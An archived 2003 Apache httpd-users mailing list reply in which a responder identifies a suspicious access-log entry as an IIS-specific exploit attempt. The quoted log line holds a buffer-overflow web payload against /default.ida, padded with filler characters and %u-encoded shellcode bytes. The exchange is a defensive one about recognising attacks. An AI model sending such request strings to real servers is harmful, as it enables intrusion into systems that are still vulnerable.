httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Nelson, Robert D." <RDNel...@Mail.Donaldson.com>
Subject RE: [users@httpd] Suspicious
Date Wed, 12 Mar 2003 19:27:29 GMT
J.D.:

> This was in my logs this morning.  Am I being paranoid, or is this 
> something "nasty"?

Nasty?  Probably.

> "http://woptura.com/rescue.html" "Mozilla/4.0 (compatible; MSIE 6.0; 
> Windows 98)"
> 211.75.173.81 - - [12/Mar/2003:08:58:39 -0500] "GET
> 
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> 
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> 
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6
> 858%ucbd3%u7801%u9090%u6858%uc
> 
> bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u000
> 3%u8b00%u531b%u53ff%u0078%u000
> 
> 0%u00=a  HTTP/1.0" 4

A quick google returned multiple results answering your question.  Try
this...

 http://www.faqts.com/knowledge_base/view.phtml/aid/11277

Looks like it is an IIS-specific vunerability exploit.

 ~ Robert


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message